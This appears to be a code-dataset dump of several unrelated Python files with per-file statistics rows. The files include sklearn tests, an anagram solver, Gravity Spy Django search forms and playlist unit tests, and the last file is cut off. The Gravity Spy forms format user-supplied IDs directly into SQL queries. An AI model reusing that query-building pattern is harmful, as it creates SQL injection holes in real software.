clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_svr_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.SVR()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_oneclasssvm_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.OneClassSVM()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_nusvc_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.NuSVC()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_nusvr_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.NuSVR()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_linearsvr_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.LinearSVR()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_linearsvc_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.LinearSVC()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
# tree
def test_sklearn_tree_decisiontreeclassifier_fit(
sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin
):
clf = tree.DecisionTreeClassifier()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_tree_extratreeregressor_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = tree.ExtraTreeRegressor()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_tree_extratreeclassifier_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = tree.ExtraTreeClassifier()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_tree_decisiontreeregressor_fit(
sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin
):
clf = tree.DecisionTreeRegressor()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
| 33.333333 | 120 | 0.791892 | 475 | 3,700 | 5.770526 | 0.098947 | 0.124042 | 0.216709 | 0.120394 | 0.816855 | 0.816855 | 0.816855 | 0.816855 | 0.816855 | 0.816855 | 0 | 0.007576 | 0.108108 | 3,700 | 110 | 121 | 33.636364 | 0.82303 | 0.005135 | 0 | 0.544118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.323529 | 1 | 0.176471 | false | 0 | 0.073529 | 0.014706 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8e59133af2246862a5a06beabd235448042fd212 | 214 | py | Python | tests/dynamodb_generators.py | adisbladis/geostore | 79439c06b33414e1e26b3aa4b93a72fd7cbbae83 | [
"MIT"
] | 25 | 2021-05-19T08:05:07.000Z | 2022-03-14T02:48:58.000Z | tests/dynamodb_generators.py | adisbladis/geostore | 79439c06b33414e1e26b3aa4b93a72fd7cbbae83 | [
"MIT"
] | 311 | 2021-05-17T23:04:56.000Z | 2022-03-31T10:41:44.000Z | tests/dynamodb_generators.py | adisbladis/geostore | 79439c06b33414e1e26b3aa4b93a72fd7cbbae83 | [
"MIT"
] | 1 | 2022-01-03T05:38:32.000Z | 2022-01-03T05:38:32.000Z | from geostore.step_function import get_hash_key
from .stac_generators import any_dataset_id, any_dataset_version_id
def any_hash_key() -> str:
return get_hash_key(any_dataset_id(), any_dataset_version_id())
| 26.75 | 67 | 0.82243 | 35 | 214 | 4.514286 | 0.485714 | 0.253165 | 0.126582 | 0.189873 | 0.392405 | 0.392405 | 0.392405 | 0 | 0 | 0 | 0 | 0 | 0.107477 | 214 | 7 | 68 | 30.571429 | 0.827225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
8e6fa618d841791b21a5b5d78a2d6e4b5bdd4a09 | 103 | py | Python | p2prp/__init__.py | Li-Pro/P2P-Remote_Party | 120144e5fdacb30c77981e59d9d242e541178b89 | [
"Apache-2.0"
] | 1 | 2020-04-10T10:15:53.000Z | 2020-04-10T10:15:53.000Z | p2prp/__init__.py | Li-Pro/P2P-Remote-Party | 7aff94c3bf4dea8327b2b49a1f7dd5abe3c60bfe | [
"Apache-2.0"
] | null | null | null | p2prp/__init__.py | Li-Pro/P2P-Remote-Party | 7aff94c3bf4dea8327b2b49a1f7dd5abe3c60bfe | [
"Apache-2.0"
] | null | null | null | # import p2prp
from p2prp.main.clientMain import runClient
from p2prp.main.serverMain import runServer | 25.75 | 43 | 0.84466 | 14 | 103 | 6.214286 | 0.571429 | 0.206897 | 0.298851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032609 | 0.106796 | 103 | 4 | 44 | 25.75 | 0.913043 | 0.116505 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8e7c7aafbfee6d52e3891151a87c01f4609290d8 | 291 | py | Python | Codewars/8kyu/bin-to-decimal/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/8kyu/bin-to-decimal/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/8kyu/bin-to-decimal/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
test.assert_equals(bin_to_decimal('0'), 0)
test.assert_equals(bin_to_decimal('1'), 1)
Test.assert_equals(bin_to_decimal('10'), 2)
Test.assert_equals(bin_to_decimal('11'), 3)
Test.assert_equals(bin_to_decimal('101010'), 42)
test.assert_equals(bin_to_decimal('1001001'), 73)
| 32.333333 | 49 | 0.762887 | 52 | 291 | 3.923077 | 0.346154 | 0.294118 | 0.470588 | 0.558824 | 0.833333 | 0.833333 | 0.284314 | 0 | 0 | 0 | 0 | 0.109489 | 0.058419 | 291 | 8 | 50 | 36.375 | 0.635037 | 0.04811 | 0 | 0 | 0 | 0 | 0.069091 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d944cbe7fd8055d123ee45ff48b8e523251b06f4 | 213 | py | Python | siccodes/admin.py | skaaldig/siccodeapi | 6ea6841f79cc605799e2c302d8460ced332946e1 | [
"MIT"
] | 3 | 2019-01-17T17:40:36.000Z | 2019-04-26T18:49:41.000Z | siccodes/admin.py | skaaldig/siccodeapi | 6ea6841f79cc605799e2c302d8460ced332946e1 | [
"MIT"
] | null | null | null | siccodes/admin.py | skaaldig/siccodeapi | 6ea6841f79cc605799e2c302d8460ced332946e1 | [
"MIT"
] | null | null | null | from django.contrib import admin
from . import models
admin.site.register(models.IndustrySector)
admin.site.register(models.IndustryGroup)
admin.site.register(models.Industry)
admin.site.register(models.SicCode)
| 26.625 | 42 | 0.835681 | 28 | 213 | 6.357143 | 0.428571 | 0.202247 | 0.382022 | 0.516854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061033 | 213 | 7 | 43 | 30.428571 | 0.89 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
8dba496e98ed478d824ce44f82dd7c2bc1b947f8 | 6,065 | py | Python | A.py | VieVie31/anagram | 38f845675b887261330c6e055e47a15adebb6ecb | [
"MIT"
] | 1 | 2018-02-27T09:24:14.000Z | 2018-02-27T09:24:14.000Z | A.py | VieVie31/anagram | 38f845675b887261330c6e055e47a15adebb6ecb | [
"MIT"
] | null | null | null | A.py | VieVie31/anagram | 38f845675b887261330c6e055e47a15adebb6ecb | [
"MIT"
] | null | null | null | from time import *
from math import factorial
from collections import Counter
dictionary = open("ods.txt").readlines()
print("dictionnaire charge...")
def check_word(reference, possible):
"""Fonction equivalente a ajout_possible quand on faisait les TP"""
tmp = reference[:]
for c in possible: #assez de caracteres
if c not in reference:
return False
else:
try:
tmp.remove(c)
except:
return False
if tmp == []:
return True
else:
return tmp
nb_sols = 0
def A1(mon_mot):
"""Prend un mot et affiche la liste des mots anagrammes du mot de depart
si la variable DEBUG est a True sinon fait juste les caulcus et met dans
la variable global nb_sols le nombre de solutions qui a ete trouve..."""
global nb_sols
def gen_anagram(anagram, possible_words):
"""La vraie fonction qui nous interresse qui genere
recursivement les anagrammes"""
for word in possible_words:
x = check_word(anagram, word)
if x == True:
yield [word]
elif x:
for y in gen_anagram(x, possible_words):
yield [word] + y
anagram = ''.join(sorted(mon_mot))
possible_words = set()
lexique = {}
for word in dictionary:
word = word.upper().strip()
key = ''.join(sorted(word))
#contruire le lexique
if key in lexique:
lexique[key].append(word)
else:
lexique[key] = [word]
#continuer a couper des branches
tmp = list("".join(anagram.split()))
skip = False
for c in word:
if c not in anagram:
skip = True
continue
else:
try:
tmp.remove(c)
except:
skip = True
continue
if skip:
continue
else:
possible_words.add(key) #avant word mais keys compresse et va plus vite
anagram = [x for x in anagram.strip() if x != ' ']
start = time()
res = set()
for x in gen_anagram(anagram, possible_words):
res.add(tuple(sorted(x)))
c = 0
for s in res:
t = 1
for k in s:
t *= len(lexique[k])
c += t
start = time() - start
nb_sols = c
if DEBUG:
print("nombre de combinaisons possible : ", c)
print("trouve en : ", start)
print('=' * 30)
print("solutions :")
def perms(L, sol=[]):
"Recree tous les anagrammes a partir des clefs choisies par gen_anagrams"
if len(L) == 1:
for v in lexique[L[0]]:
sol.append(v)
print(" ".join(sol))
sol.remove(v)
else:
k = L[-1]
for k in lexique[k]:
sol.append(k)
perms(L[:-1], sol)
sol.remove(k)
for L in res:
L = list(L)
if DEBUG:
perms(L)
def A2(mon_mot, nb_mots):
"""Prend un mot et affiche la liste des mots anagrammes du mot de depart
constituees au plus de n mots si la variable DEBUG est a True sinon fait
juste les caulcus et met dans la variable global nb_sols le nombre
de solutions qui a ete trouve..."""
global nb_sols
def gen_anagram(anagram, possible_words, limit=0, rec=0):
"""La vraie fonction qui nous interresse qui genere
recursivement les anagrammes"""
for word in possible_words:
x = check_word(anagram, word)
if x == True:
yield [word]
elif x and rec < limit:
for y in gen_anagram(x, possible_words, limit-1, rec+1):
if len(y) < limit:
yield [word] + y
anagram = ''.join(sorted(mon_mot))
possible_words = set()
lexique = {}
for word in dictionary:
word = word.upper().strip()
key = ''.join(sorted(word))
#contruire le lexique
if key in lexique:
lexique[key].append(word)
else:
lexique[key] = [word]
#continuer a couper des branches
tmp = list("".join(anagram.split()))
skip = False
for c in word:
if c not in anagram:
skip = True
continue
else:
try:
tmp.remove(c)
except:
skip = True
continue
if skip:
continue
else:
possible_words.add(key) #avant word mais keys compresse et va plus vite
anagram = [x for x in anagram.strip() if x != ' ']
start = time()
res = set()
for x in gen_anagram(anagram, possible_words, nb_mots):
res.add(tuple(sorted(x)))
c = 0
for s in res:
t = 1
for k in s:
t *= len(lexique[k])
c += t
start = time() - start
nb_sols = c
if DEBUG:
print("nombre de combinaisons possible : ", c)
print("trouve en : ", start)
print('=' * 30)
print("solutions :")
def perms(L, sol=[]):
"Recree tous les anagrammes a partir des clefs choisies par gen_anagrams"
if len(L) == 1:
for v in lexique[L[0]]:
sol.append(v)
print(" ".join(sol))
sol.remove(v)
else:
k = L[-1]
for k in lexique[k]:
sol.append(k)
perms(L[:-1], sol)
sol.remove(k)
for L in res:
L = list(L)
if DEBUG:
perms(L) #on affiche les solutions
def fun_nb_sols():
global nb_sols
return nb_sols
if __name__ == "__main__":
DEBUG = True #on affiche les resultats trop styles !! :D
else: #bein on affiche aps tout pour les tests unitaires
DEBUG = False
| 26.836283 | 83 | 0.504864 | 753 | 6,065 | 4.001328 | 0.208499 | 0.051776 | 0.019914 | 0.03319 | 0.808165 | 0.808165 | 0.800531 | 0.800531 | 0.780617 | 0.780617 | 0 | 0.006352 | 0.402968 | 6,065 | 225 | 84 | 26.955556 | 0.825739 | 0.188953 | 0 | 0.829412 | 0 | 0 | 0.059896 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047059 | false | 0 | 0.017647 | 0 | 0.094118 | 0.064706 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ded6a7f99719df9dd630205294bb2dad7c36032 | 10,726 | py | Python | gravityspytools/search/forms.py | Gravity-Spy/gravityspytools | 23ef83e36ed934f7c39440bf43f4d5c7b7b4abb0 | [
"BSD-3-Clause"
] | 4 | 2019-03-11T12:32:24.000Z | 2020-12-01T06:31:39.000Z | gravityspytools/search/forms.py | johnwick211/gravityspytools | 23ef83e36ed934f7c39440bf43f4d5c7b7b4abb0 | [
"BSD-3-Clause"
] | 19 | 2018-01-29T21:28:39.000Z | 2020-07-14T18:38:23.000Z | gravityspytools/search/forms.py | johnwick211/gravityspytools | 23ef83e36ed934f7c39440bf43f4d5c7b7b4abb0 | [
"BSD-3-Clause"
] | 4 | 2018-02-02T16:47:16.000Z | 2020-12-01T06:31:49.000Z | from django import forms
from gwpy.table import EventTable
def get_imageid_json(name=''):
return EventTable.fetch('gravityspy', 'similarity_index_o3 WHERE \"gravityspy_id\" ~ \'{0}\' LIMIT 20'.format(name), columns=["gravityspy_id"], host='gravityspyplus.ciera.northwestern.edu').to_pandas().rename(columns={'gravityspy_id': 'value'}).to_json(orient='records')
def get_zooid_json(name=''):
return EventTable.fetch('gravityspy', 'similarity_index_o3 WHERE CAST(links_subjects AS TEXT) ~ \'{0}\' LIMIT 20'.format(name), columns=["links_subjects"], host='gravityspyplus.ciera.northwestern.edu').to_pandas().astype(str).rename(columns={'links_subjects': 'value'}).to_json(orient='records')
def get_gpstimes_json(name=''):
return EventTable.fetch('gravityspy', 'similarity_index_o3 WHERE CAST(\"event_time\" AS TEXT) ~ \'{0}\' LIMIT 20'.format(name), columns=["event_time"], host='gravityspyplus.ciera.northwestern.edu').to_pandas().astype(str).rename(columns={'event_time': 'value'}).to_json(orient='records')
class SearchForm(forms.Form):
SINGLEVIEW = 'similarityindex'
MULTIVIEW = 'similarity_index_o3'
DATABASE_CHOICES = (
(MULTIVIEW, 'Multiview Model'),
(SINGLEVIEW, 'Single View Model'),
)
H1 = "\'H1\'"
H1L1 = "\'H1\', \'L1\'"
H1L1V1 = "\'H1\', \'L1\', \'V1\'"
L1 = "\'L1\'"
L1V1 = "\'L1\', \'V1\'"
V1 = "\'V1\'"
IFO_CHOICES = (
(H1L1, 'H1 L1'),
(H1, 'H1'),
(H1L1V1, 'H1 L1 V1'),
(L1, 'L1'),
(L1V1, 'L1 V1'),
(V1, 'V1'),
)
ALL = "event_time BETWEEN 1126400000 AND 1584057618"
O1 = "event_time BETWEEN 1126400000 AND 1137250000"
ER10 = "event_time BETWEEN 1161907217 AND 1164499217"
O2a = "event_time BETWEEN 1164499217 AND 1219276818"
ER13 = "event_time BETWEEN 1228838418 AND 1229176818"
ER14 = "event_time BETWEEN 1235750418 AND 1238112018"
O3a = "event_time BETWEEN 1238166018 AND 1254009618"
O3b = "event_time BETWEEN 1256655642 AND 1272326418"
O3 = "event_time BETWEEN 1238166018 AND 1272326418"
ERAS = (
(ALL, 'ALL'),
(O1, 'O1'),
(ER10, 'ER10'),
(O2a, 'O2a'),
(ER13, 'ER13'),
(ER14, 'ER14'),
(O3a, 'O3a'),
(O3b, 'O3b'),
(O3, 'O3'),
)
database = forms.ChoiceField(choices=DATABASE_CHOICES,)
howmany = forms.IntegerField(label='How many similar images would you like to return', max_value=200, min_value=1)
zooid = forms.CharField(label = 'This is the Zooniverse assigned random ID of the image (an integer value)', max_length=10, required=False)
imageid = forms.CharField(label='The GravitySpy uniqueid (this is the 10 character hash that uniquely identifies all gravity spy images)', max_length=10, required=False)
ifo = forms.ChoiceField(choices=IFO_CHOICES,)
era = forms.ChoiceField(choices=ERAS,)
def clean(self):
cleaned_data = super(SearchForm, self).clean()
zooid = cleaned_data.get('zooid')
imageid = cleaned_data.get('imageid')
ifos = str(cleaned_data.get('ifo'))
database = cleaned_data.get('database')
era = cleaned_data.get('era')
if zooid and imageid:
raise forms.ValidationError("Please fill out "
"only one of the zooid "
"or gravityspy id fields"
)
elif (not zooid) and (not imageid):
raise forms.ValidationError("Please fill out "
"one but not both of the zooid "
"and gravityspy id fields"
)
if zooid and not imageid:
if not EventTable.fetch('gravityspy', 'nonanalysisreadyids WHERE links_subjects = {0}'.format(zooid), host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("This zooID is one of a handful of glitches that were mistakenly uploaded, despite being glitches"
"occuring while the detector was not in a state to be taking quality data "
"(i.e. people may have been working on the instrument at the time."
)
if EventTable.fetch('gravityspy', '{0} WHERE links_subjects = {1}'.format(database, zooid), columns=['links_subjects'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("zooid does not exist")
elif EventTable.fetch('gravityspy', '{0} WHERE links_subjects = {1} AND ifo IN ({2})'.format(database, zooid, ifos), columns=['links_subjects'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("This image is not from one of the interferometers you selected"
)
if imageid and not zooid:
if not EventTable.fetch('gravityspy', 'nonanalysisreadyids WHERE \"gravityspy_id\" = \'{0}\''.format(imageid), host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("This gravityspy_id is one of a handful of glitches that were mistakenly uploaded, despite being glitches"
"occuring while the detector was not in a state to be taking quality data "
"(i.e. people may have been working on the instrument at the time."
)
if EventTable.fetch('gravityspy', '{0} WHERE \"gravityspy_id\" = \'{1}\''.format(database, imageid), columns=['gravityspy_id'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("uniqueid does not exist")
elif EventTable.fetch('gravityspy', '{0} WHERE \"gravityspy_id\" = \'{1}\' AND ifo IN ({2})'.format(database, imageid, ifos), columns=['gravityspy_id'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("This image is not from one of the interferometers you selected"
)
def clean_zooid(self):
zooid = self.cleaned_data['zooid']
if not zooid:
zooid = False
return zooid
def clean_imageid(self):
imageid = self.cleaned_data['imageid']
if not imageid:
imageid = False
return imageid
class LIGOSearchForm(forms.Form):
howmany = forms.IntegerField(label='How many similar images would you like to return', max_value=200, min_value=1)
zooid = forms.CharField(label = 'This is the Zooniverse assigned random ID of the image (an integer value)', max_length=10, required=False)
imageid = forms.CharField(label='The GravitySpy uniqueid (this is the 10 character hash that uniquely identifies all gravity spy images)', max_length=10, required=False)
gpstime = forms.CharField(label = 'Supply a gps time of an excess noise feature', required=False)
SINGLEVIEW = 'similarityindex'
MULTIVIEW = 'similarity_index_o3'
DATABASE_CHOICES = (
(MULTIVIEW, 'Multiview Model'),
(SINGLEVIEW, 'Single View Model'),
)
H1 = "\'H1\'"
H1L1 = "\'H1\', \'L1\'"
H1L1V1 = "\'H1\', \'L1\', \'V1\'"
L1 = "\'L1\'"
L1V1 = "\'L1\', \'V1\'"
V1 = "\'V1\'"
IFO_CHOICES = (
(H1L1, 'H1 L1'),
(H1, 'H1'),
(H1L1V1, 'H1 L1 V1'),
(L1, 'L1'),
(L1V1, 'L1 V1'),
(V1, 'V1'),
)
ALL = "event_time BETWEEN 1126400000 AND 1584057618"
O1 = "event_time BETWEEN 1126400000 AND 1137250000"
ER10 = "event_time BETWEEN 1161907217 AND 1164499217"
O2a = "event_time BETWEEN 1164499217 AND 1219276818"
ER13 = "event_time BETWEEN 1228838418 AND 1229176818"
ER14 = "event_time BETWEEN 1235750418 AND 1238112018"
O3a = "event_time BETWEEN 1238166018 AND 1254009618"
O3b = "event_time BETWEEN 1256655642 AND 1272326418"
O3 = "event_time BETWEEN 1238166018 AND 1272326418"
ERAS = (
(ALL, 'ALL'),
(O1, 'O1'),
(ER10, 'ER10'),
(O2a, 'O2a'),
(ER13, 'ER13'),
(ER14, 'ER14'),
(O3a, 'O3a'),
(O3b, 'O3b'),
(O3, 'O3'),
)
ifo = forms.ChoiceField(choices=IFO_CHOICES,)
database = forms.ChoiceField(choices=DATABASE_CHOICES,)
era = forms.ChoiceField(choices=ERAS,)
def clean(self):
cleaned_data = super(LIGOSearchForm, self).clean()
zooid = cleaned_data.get('zooid')
imageid = cleaned_data.get('imageid')
gpstime = cleaned_data.get('gpstime')
ifos = cleaned_data.get('ifo')
database = cleaned_data.get('database')
if (zooid and imageid and gpstime) or (zooid and imageid) or \
(zooid and gpstime) or (gpstime and imageid):
raise forms.ValidationError("Please fill out "
"only one of the zooid "
"or gravityspy id fields"
)
elif (not zooid) and (not imageid) and (not gpstime):
raise forms.ValidationError("Please fill out "
"one but not both of the zooid "
"and gravityspy id fields"
)
if zooid and not imageid and not gpstime:
if EventTable.fetch('gravityspy', '{0} WHERE links_subjects = {1}'.format(database, zooid), columns=['links_subjects'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("zooid does not exist"
)
if imageid and not zooid and not gpstime:
if EventTable.fetch('gravityspy', '{0} WHERE \"gravityspy_id\" = \'{1}\''.format(database, imageid), columns=['gravityspy_id'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("uniqueid does not exist"
)
def clean_zooid(self):
zooid = self.cleaned_data['zooid']
if not zooid:
zooid = False
return zooid
def clean_imageid(self):
imageid = self.cleaned_data['imageid']
if not imageid:
imageid = False
return imageid
def clean_gpstime(self):
gpstime = self.cleaned_data['gpstime']
if not gpstime:
gpstime = False
return gpstime
| 44.878661 | 299 | 0.592765 | 1,200 | 10,726 | 5.206667 | 0.158333 | 0.03025 | 0.046095 | 0.06162 | 0.899808 | 0.889565 | 0.862676 | 0.826344 | 0.81322 | 0.782811 | 0 | 0.072689 | 0.286873 | 10,726 | 238 | 300 | 45.067227 | 0.74415 | 0 | 0 | 0.704663 | 0 | 0 | 0.363509 | 0.037945 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051813 | false | 0 | 0.010363 | 0.015544 | 0.388601 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
308d8d5d2fc129945b3f796fd802472fab7e4d9e | 10,360 | py | Python | test/test_playlist_model.py | ooyamatakehisa/bpm-searcher | 0e606c1fa11da8ebcb7dc7bfbb4f3ac2556f6863 | [
"MIT"
] | null | null | null | test/test_playlist_model.py | ooyamatakehisa/bpm-searcher | 0e606c1fa11da8ebcb7dc7bfbb4f3ac2556f6863 | [
"MIT"
] | 30 | 2021-08-25T16:33:32.000Z | 2021-12-13T06:49:38.000Z | test/test_playlist_model.py | ooyamatakehisa/bpm-searcher | 0e606c1fa11da8ebcb7dc7bfbb4f3ac2556f6863 | [
"MIT"
] | null | null | null | from datetime import datetime
import unittest
from domain.model.playlist import Playlist, PlaylistInfo
from domain.model.track import PlaylistTrack, Track
class TestPlaylistInteractor(unittest.TestCase):
def test_delete1(self) -> None:
"""Testcase where the playlist has 2 tracks and delete first track
"""
playlist_id = "playlist_id1"
playlist_track_id1 = "playlist_track_id1"
date_time = datetime.now()
playlist_track1 = PlaylistTrack(
id=playlist_track_id1,
order=1,
track=Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
),
created_at=date_time,
updated_at=date_time,
)
playlist_track2 = PlaylistTrack(
id="playlist_track_id2",
order=2,
track=Track(
spotify_id="spotify_id2",
song_name="song_name2",
artist="artist2",
album_name="album_name2",
bpm=222.2,
danceability=222.2,
energy=222.2,
image_url="image_url2",
key=2,
mode=2,
preview_url="preview_url2",
),
created_at=date_time,
updated_at=date_time,
)
playlist = Playlist(
playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=2,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[
playlist_track1,
playlist_track2,
],
)
new_playlist = playlist.delete(playlist_track1)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 1)
self.assertEqual(new_playlist.playlist_info.image_url, "image_url2")
self.assertEqual(len(new_playlist.playlist_tracks), 1)
self.assertEqual(new_playlist.playlist_tracks[0].id, "playlist_track_id2")
self.assertEqual(new_playlist.playlist_tracks[0].order, 1)
def test_delete2(self) -> None:
"""Testcase where the playlist has 2 tracks and delete second track
"""
playlist_id = "playlist_id1"
playlist_track_id1 = "playlist_track_id1"
date_time = datetime.now()
playlist_track1 = PlaylistTrack(
id=playlist_track_id1,
order=1,
track=Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
),
created_at=date_time,
updated_at=date_time,
)
playlist_track2 = PlaylistTrack(
id="playlist_track_id2",
order=2,
track=Track(
spotify_id="spotify_id2",
song_name="song_name2",
artist="artist2",
album_name="album_name2",
bpm=222.2,
danceability=222.2,
energy=222.2,
image_url="image_url2",
key=2,
mode=2,
preview_url="preview_url2",
),
created_at=date_time,
updated_at=date_time,
)
playlist = Playlist(
playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=2,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[
playlist_track1,
playlist_track2,
],
)
new_playlist = playlist.delete(playlist_track2)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 1)
self.assertEqual(new_playlist.playlist_info.image_url, "image_url1")
self.assertEqual(len(new_playlist.playlist_tracks), 1)
self.assertEqual(new_playlist.playlist_tracks[0].id, "playlist_track_id1")
self.assertEqual(new_playlist.playlist_tracks[0].order, 1)
def test_delete3(self) -> None:
"""Testcase where the playlist has 1 tracks and delete it
"""
playlist_id = "playlist_id1"
playlist_track_id1 = "playlist_track_id1"
date_time = datetime.now()
playlist_track1 = PlaylistTrack(
id=playlist_track_id1,
order=1,
track=Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
),
created_at=date_time,
updated_at=date_time,
)
playlist = Playlist(
